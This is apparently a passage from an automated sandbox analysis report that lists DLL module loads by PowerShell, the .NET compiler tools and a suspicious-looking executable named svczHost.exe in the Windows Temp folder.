Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: taskflowdataengine.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cdp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dsreg.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\Temp\svczHost.exe	Section loaded: apphelp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: edgegdi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: icu.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: winhttp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: mswsock.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: wshunix.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: winrnr.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: nlaapi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: wshbth.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: devobj.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: napinsp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: winnsi.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: sspicli.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: schannel.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: msasn1.dll
Source: C:\Windows\Temp\svczHost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll
